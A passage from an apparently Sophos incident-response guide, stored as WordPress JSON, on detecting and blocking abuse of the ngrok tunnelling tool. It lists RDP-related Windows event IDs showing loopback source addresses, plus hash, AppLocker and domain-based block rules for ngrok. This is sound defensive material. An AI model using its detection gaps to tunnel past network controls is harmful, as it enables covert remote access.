<li><strong><u>Windows event logs<\/u><\/strong>\n<ul>\n<li><strong>Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx<\/strong>\n<ul>\n<li>Event ID 1149\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx\n<ul>\n<li>Event ID 21 (Logon succeeded)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span>\n<ul>\n<li>Note: This event ID will only populate if an RDP connection is established via user credentials that differ from any currently logged on users with sessions<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Event ID 22 (Shell start notification)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span>\n<ul>\n<li>Note: This event ID will only populate if an RDP connection is established via user credentials that differ from any currently logged on users with sessions<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Event ID 24 (Session has been disconnected)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<li>Event ID 25 (Session reconnection succeeded)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span>\n<ul>\n<li>Note: This event ID will only populate if an RDP connection is established via user credentials belonging to a currently logged-on user with a session, or as a continuation of a disconnection via the same session\u2019s ID<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n
<li><strong>Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx<\/strong>\n<ul>\n<li>Event ID 131 (The server accepted a new TCP connection from client)\n<ul>\n<li>The server accepted a new TCP connection from client [<span style=\"color: #99cc00\"><strong>::1<\/strong><\/span>]:53645 (53645 is the ephemeral source port assigned for the connection; this would be a non-static value)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Security.evtx<\/strong>\n<ul>\n<li>Event ID 4624 (account was successfully logged on)\n<ul>\n<li>Source Network Address: <span style=\"color: #99cc00\"><strong>::1<\/strong><\/span>\n<ul>\n<li>Note: ::1 &gt; IPv6 loopback address<\/li>\n<li>Logon Type: 10 (RemoteInteractive, i.e. RDP)\n<ul>\n<li>Note: Together, these two values indicate an RDP logon whose source address is the local loopback interface, consistent with the tunnel terminating on the host itself<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
<h3>Respond<\/h3>\n<p>Now that we have information derived from investigation and analysis, we can respond to an unwanted instance of ngrok and clean up the network\/endpoints, using Sophos Central (or another installed security solution and its policies) to block the application. There are various ways to accomplish this.<\/p>\n<p>Sophos Central has a global block list by hash (although only versions of ngrok whose hashes have been added would be blocked).<\/p>\n<p>Microsoft AppLocker policies \/ rule sets concerning unsigned binaries can also be put in place to counter this, since the ngrok binary is currently not digitally signed.<\/p>\n<p>Mitigation can also be handled at proxy servers or firewalls (if reviewing DNS requests \/ TLS decryption packet inspection). Although ngrok binaries can differ in name, hash, location, and so forth, the initial network communications to ngrok\u2019s public infrastructure appear to be static. For example:<\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>Top-level domain &gt; .io<\/li>\n<li>Second-level domain &gt; <span style=\"color: #99cc00\"><strong>ngrok<\/strong><\/span>\n<ul>\n<li>This second-level domain remains static and could be used to block network traffic<\/li>\n<\/ul>\n<\/li>\n<li>Subdomain &gt; Random if using a free version; other tiers allow static domains<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
<p>Likewise, for DNS requests, a similar approach could be adopted to block ngrok traffic and identify which machines were initiating the DNS requests. Note that, as shown in various instances above, ngrok uses multiple top-level domains (.com, .io):<\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>Top-level domain &gt; .com<\/li>\n<li>Second-level domain &gt; <span style=\"color: #99cc00\"><strong>ngrok<\/strong><\/span>\n<ul>\n<li>This second-level domain, which in our experience remains static, could be used to detect the network request from the source host and block the traffic. Although the subdomains also appear to be static, the detection \/ block would be cleaner using the second-level ngrok value, in case different regions provide alternate subdomains or differ in some other way<\/li>\n<\/ul>\n<\/li>\n<li>Subdomains &gt; tunnel.US<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Before restoring from backup, remember to check that your backups are also clean.<\/p>\n<\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2022\/07\/14\/rapid-response-the-ngrok-incident-guide\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/07\/122024889_m.jpg\"\/><\/p>\n<p><strong>Credit to Author: Angela Gunn| Date: Thu, 14 Jul 2022 08:01:51 +0000<\/strong><\/p>\n<p>Ngrok is a legitimate remote-access tool. 
It is regularly abused by attackers, who use its capabilities and reputation to maneuver while bypassing network protections. This incident guide shows Security Operations Centers (SOCs) and response teams how to detect and respond to the suspicious presence or use of ngrok on the network.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[12657,25274,24328,18513,16771],"class_list":["post-19594","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-incident-response","tag-mtrrapid-response","tag-ngrok","tag-sophoslabs-uncut","tag-threat-research"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19594"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19594\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19594"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}